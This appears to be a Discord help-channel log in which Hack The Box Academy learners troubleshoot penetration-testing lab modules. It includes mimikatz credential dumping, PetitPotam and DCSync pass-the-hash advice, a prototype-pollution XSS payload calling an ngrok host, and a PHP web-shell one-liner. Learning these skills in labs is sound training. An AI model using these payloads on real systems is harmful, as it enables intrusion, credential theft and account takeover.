restart the lab lmao

running a collector locally works ?_?

confusion maxed out

does it even use dns tho

I assume if it's a machine in the domain the hosts and ip are already cached

that sounds about right yeah

Maybe it’s the directory?

I need put the dmp into mimikatz directory?

no? any dir you have write and read access to is fine

dump it with procdump and load into mimi

Why three times?

Cuz I dmp it at C:/Tools/ProcDump and mimikatz it at C:/Tools/Mimikatz/Win32/mimikatz.exe

doesn't matter as long as you can read from it

what's the error you're getting

Memory error

... yeah like... what's the exact error

hi

random question, why would a port number be different on the raw scan to the port in the html file?

Hi
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities

I am doing the PetitPotam attack. After using getnthash.py, I get the NT hash for the Domain Controller from the TGT. Now, to perform DCSync using hash, I also need the LM hash. How can I find this?

you don't, in any modern windows os (> win2000 iirc) the use of LM hash is disabled

if you're using impacket you can just do --hashes :<nt hash>

Yeah, just tried that and it works!

Sorry not at my laptop fn later will send

Module: ACTIVE DIRECTORY TRUST ATTACKS
Section: Mapping Active Directory Trusts
Description: unable to pull up the screen of Adalanche.exe
Link: https://academy.hackthebox.com/module/253/section/2801

I am trying to use the base64 encoded certificate that I obtained earlier to request TGT and perform PTT using Rubeus. But I am getting the error:

Why is this happening and what can I do to resolve it?

try to coerce again, but for this attack there isn't much point of using rubeus

if you've able to use getnthash and secretsdump you're good to go

What do you mean coerce again? Use petitpotam.py to get the certificate base64 again?

yes

Huh am I blind 😭

lol what

I see it too

hmmm I shall try that 🤔

it is at the very second to last line of your screenshot

Yeah I see what they mean now

it just blends in xD

Spam the endpoint /api/v1/authentication/customers/passwords/resets/sms-otps and after enough trys it will give you a extra response

I had a query in a challenge. Is this the right place to ask? Or some other channel?

#challenges

I don't have access to this

For some reason

verify your account -> #welcome

Ohhhhh. Thanks!

I have a question I am trying to do the linux fundamental module I'm stuck on the "find files" it keeps giving me permission denied and the solution is doesn't help.

Are you ssh to the target?

yes I am @fathom pendant

@fathom pendant do I need to update?

So when you do whoami it says "htb-student"?

If not: then you aren't ssh

The target is the "Click here to spawn target!" / 10.129.x.x ip

Spawn Instance is the in-browser vm, pwnbox

They are not the same

@fathom pendant nevermind I need to 2>/dev/null to remove the errors

K

Btw you won't be able to update targets

As they're not connected to the internet

huh that doesn't work though, I'm looking for a flag, that's just the output it's giving to the search result

whats your guys opinion on the web services and api module? it seems really confusing to me

Windows Lateral Movement, focusing on both offensive and defensive?

actually, the module artwork has the win11 logo, so we're getting some good up-to-date content

I mean

Plenty of offices still use 10

can someone explain me about this question actually what i need to do here even i am able to login with provided details :- Module:-Broken authentication (section:-Enumerating users) do i need to fuzz ?

it uses netexec

dont worry i have changed the target ip

yea but it's nice to see the win11 content as well

I mean win11 and win10 are pretty much the same under the hood

i haven't seen too much of it

That's not the flag though, how am I supposed to find it 🤔

really?

yes

Have you tried searching for it?

iirc, you have to create a city named flag, then delete any city from the cities list of the server and search for flag

I could be wrong I don't remember exactly

still curious about the module though

web requests

He means the new one

no, the Lateral Movement module

can someone also help me

Sure

WMI, DCOM and WSUS are the interesting ones to me

this1

those all seem to correlate with privileged access

Searching for it where?

lol I'll have to try that

i think there are impacket scripts that exploit access to those

Yes you need to fuzz

As described by the section @ebon nymph

bro can you help me with command i am using default command which is provided in writeup

You have to enumerate the web app to potentially find valid users and provide the username of the user you've found as the answer

bro can i use burpsuite here instead of ffuf

Footprinting module - DNS
I am struggling for the last question, from what I understood I am supposed to do some dns subdomains bruteforcing, but I can't get anything useful back, I don't even find all the hosts that I know exist from the zone transfer (especially dev doesn't show up, i tried with my own list to make sure)
Here is my command

dnsenum --dnsserver 10.129.73.53 --enum -p 0 -s 0 -f /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -r inlanefreight.htb

Am I doing something wrong, or should I just keep trying every wordlist from SecLists until it works ? I tried to enumerate the internal zone as well but it returns an error so I am guessing it is not there
Any help will be greatly appreciated !

i mean you just need to use the right wordlist and filter out the string

subdomains of subdomains

ok

just do a base transfer, no bruteforce

dig axfr inlanefreight.htb @ip

Wait is there no bruteforce for the last question ? The hint is about wordlists so that seems odd

it is

That worked, thank you 😭 I did not think of doing that, when people were saying search I thought they were talking about network requests or something... just a bit confusing

but to get the right initial subdomain you don't need to bruteforce it

but you can't bruteforce a subdomain of a subdomain that you don't know about

Lol

the answer will be a.b.inlanefreight.htb

Oh yes ok, it is ||internal|| right ?

no

oho

you can already transfer to that subdomain, why do you need to bruteforce it?

hi guys,i have problem, mysql -h 127.0.0.1 -u chamilo -p chamilo
Enter password: 03F6lY3uXAP2bkW8 .I enter right pass,but mysql just silence. if i enter wrong pass,it write what pass wrong

I thought maybe it didn't show me everything but it makes sense now that I won't find anything more
If it accepted to transfer then it trusts me completely

well

it just means that it's set up for those 2 zones

inlanefreight.htb and ||internal||

Hello, any news about the push of the module api attacks in cbbh ? il will launch my exam next monday and i don't want to be surprised ^^

ok interesting
And is there anything that can help me find which subdomain to brute force, or should I try everyone of them ?

Thanks a lot already thats very helpful

did u tried : mysql -h 127.0.0.1 -u chamilo -p

and then wait for asking password ?

try them all to see what sticks

what I did was just generate a list of all base b.inlanefreight.htb subdomains i found in my initial transfer then use dnsenum against those

as a further hint; you'll need a more fierce wordlist

it didn't work,it doesn't go any further.

try mysql --user=username --password=password

Hahaha thanks I'll try that

thx

Made it thank you so much !

Hi , Regarding the Client Side Prototype Pollution module, I am facing some difficulty creating the final payload. Cannot seem to send the = in between parameter 'promote' and the value 2 /profile.php?__proto__[src][]=data:,$.get("http://ngrok-app/admin.php?promote=".concat("2")) Tried using this payload, put = in both the end of promote and before 2, have been checking the responses using ngrok forwarding, whenever I'm sending =, the request isn't being made. For context, ngrok-app will be replaced by the target and is meant to be a XSS session riding attack

Pivoting, Tunneling, and Port Forwarding>Dynamic Port Forwarding w/ SSH & SOCKS Tunneling: on question 2, my rdp connection is failing

and on my ssh connection its showing a refused connection

Why doesn't this work?

Not sure why it wouldn't be vaild, I tried another one to double check and the same thing happened

also idk why there's the error "could not resolve host" 🤔

Windows is dumb

Escape the quotes

Idr if you need to also escape the curly braces

can somoen help me out with this? I just want to get this working in Python and it won't

Your target may not have internet access. It's failing to resolve the domain.

but why does it do same thing if I give it private IP address from local network or at a minimum it does something similar

-m you're asking to execute a module

in the example it uses -m

that's part of why I'm confused

DM me the module link?

ok

done

Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain RCE on gitlab instance. Submit the flag in te directory you land in.

Hi, I need help with this question. I found the user D... but the password no. I tired hydra with rockyou, and review code. But nothing. Somebody pls help :cSOLVED

@trail sail that's a Tier 2 module, please avoid posting spoilers like that. Ask for a nudge mentioning the module and section, but don't post potential spoilers like that please.

Tier 0 modules, it's fine, but anything above please avoid

what do you mean, I just know escape on Discord uses the \

Yes use \

Before each "

oh fun...

One point, I know that's not a Powershell prompt, but Powershell be weeeeird when it comes to characters like { and quotes.

Looks like rdp isn't running

Windows overall

right & I've reset the host to make sure i'm not going crazy lol

More Tier 2 module spoilers, maaan

Good night, I'm done 😆

{"a":"b"} On linux
{\"a\":\"b\"} on Windows

See my message just above dude

The double quotes need to be escaped

Not single

Anyway try not to spoiler the module

hm my message was deleted?

oh sorry

oh I didn't think there were any

ohh nvm I see some

now it says no url specified

oh nvm I missed one

It says the same thing now, can I just dm it to you

try escaping the braces as well \{\"a\":\"b\"\}

alright

i remember looking it up

short answer though is: windows sucks for this sort of thing

hmm it still says the same thing :/

Hello, sorry to interrupt, has anyone done escaping IDS/IPS in Nmap? I am stuck in the medium challenge :/

'\{\"search\":\"flag\"\}'

@onyx cairn I also just thought of something; visit the webpage -- open devtools --> network -- do a search -- select the request -- copy for curl (Windows)

https://dontasktoask.com

hm okay

it'll provide you the proper formatting

so you're not just guess and checking

also you might need to do -u http://ip:port

idk why you're not doing this in a linux vm

I did try slow speeding, using a specific NSE script on the port, tried UDP and ack just to make sure, and random source packets as well

Still seems unable to grab the DNS version.

I tried that but got an error, I'll just try again

try from the pwnbox; this one can seem weird

Moreover I get this weird error on both pwnbox and my local system:

nmap: traceroute.cc:653: virtual unsigned char* ICMPProbe::build_packet(const sockaddr_storage*, u32*) const: Assertion `source->ss_family == AF_INET' failed.
zsh: IOT instruction  sudo nmap -p 53 10.129.2.80 -A -T3 --script dns-nsid -D RND:5 -Pn

you don't need to do RND

did you copy the one for (Windows)?

but that's at least a start here

now you just need to fix the -d if it's not escaped any characters

hm first of all why can't I paste things into the Linux terminal 🥲

ctrl+shift+v

Still, port is filtered

ctrl+v enables verbose mode- it enters the literal next character you press

in ye-olde days it was ctrl+shift+c == ctrl+shift+v

Got it now, had to change to different scan type!

Any idea of this error? Happens on pwnbox as well on speed T3-4 with -D flag set.

Just curious

oooh ty

@onyx cairn use --trace-ascii with curl to see exactly what it is sending

If the server is saying invalid JSON, then something funky is going on with how cmd is parsing your input

Last time I remember this coming up, easiest was to go to a bash prompt instead 😅

oh nvm I got it in the Linux vm, regardless ty for the help!!

👍

is this an error with the module/machine? or did i miss something along the way

try changing vpn regions and resetting the lab fully

still closed

can you try connecting to it? or still same error?

yeah it's windows being dum

same error, nmap shows its closed, xfreerdp connection refused - gotta run some errands I'll try again tonight

thanks for the help though!

Yeah.. seeing advice like "{"""key""":"""value"""}"

It's just.. what..

it just has to do with a lot of escaping

Just be normal and treat ' wrapped strings as literals

Yup

Don't know if this is the right topic, but I'm busting my head up against the wall for 6 hours!
Can't seem to find a way on the second question.

what module?

it helps to include the module and section name

Sorry! These 6 hours are taking it's toll! 🤦‍♂️
Active Directory Trust Attacks - Skill Assessment

Take it to DM, if someone is willing 🙂

goblin that's barely a spoiler

if we can't talk about the modules at all then this channel is pretty pointless imo

anyways @dapper moth you saw that so just go with it

Perhaps I'm being too sensitive..

Sorry. I should just leave it to the mods 😅

I tried that attack path which you referenced but can't seem to get the result that I wanted.
Will try other "numbers"

I get it but yeah if there's no info at all it makes helping pretty difficult

something have to be above 1k if you remember that

It's a balance between nudging and spoiling.. I sometimes get that balance wrong when removing messages.

I'm only human 🙈

🎵 I'm only human, after all 🎵

My daughter loves that song

...and NGL, I enjoy it too

the song indeed bangs

Tried both of the ones enumerated in Bloodhound. Still can't seem to get mimikatz to give me what I want.

dm me what you've got

xls

https://academy.hackthebox.com/module/145/section/1343
Whenever I try any payload the target just times out.

anybody willing to answer a question on https://academy.hackthebox.com/module/23/section/513 ((( Skills Assessment - File Inclusion ))) i got in i got to where you fuzz i got the access log i use burp.. and nothing i donno if i have enough or not enough ../ i have picture would like to pm so does not break rules pls ping me / reply so i know i got msg

change vpn do it again i had this very issue with soembody spent like 12 hrs on it just to find the box was broken / not responding once i changed vpn i finished in like 1 min flat

Hi, in the "Footprinting Oracle TNS" module in the pentester jb path it says "From this point, we could retrieve the password hashes from the sys.user$ and try to crack them offline."

How would we do the cracking?

hashcat is what i like

anyone have any advice for issue starting impackets mssqlclient during the archetype box? (using pwnbox)

every time I try to authenticate using the password and username i know is correct but keep seeing “login failed”

note im using <?php system($_GET['cmd']); ?> it just ignores me

ask in #starting-point

i need to log a bit pls ping me if i can pm / send pic so i can see what im doing wrong ty ^=^

a new module, interesting. wonder what the difference is between that and the pivot module since the pivot module shows you several ways to pivot through windows machines

says no access

sign up via #welcome

verify your account -> #welcome

Using the PwnBox.

hey need some admin help I can't identify my user here !

just dm one

anyone with a shield next to their name is a mod/admin

Thank u!

If your command output contains ANSI escape characters, how do ya'll get rid of it?

you can output it to a file

If I use the following command to enumerate Domain Users in AD, it returns a file containing ANSI escape chars

sudo crackmapexec smb 172.16.5.5 -u username -p password --users > output.txt

So how do I remove it from that file?

you can use sed/awk

even grep

python, pearl, text editor, choose your poison really

I used GPT and it gave this

sed -r 's/\x1B\[[0-9;]*[A-Za-z]//g'

How would you do it using grep? My aim to to be able to filter the list and obtain a user list using grep, that's why I wanna remove the ANSI chars.

first don't use cme anymore, we use netexec now, second --users --log ./users.txt

Haven't gotten around to learning netexec and modifying my cheatsheet just yet 😅

it's just a fork of cme that's being maintained

you don't need to change anything other than calling nxc instead of cme

Oh... so the syntax doesn't change at all?

nope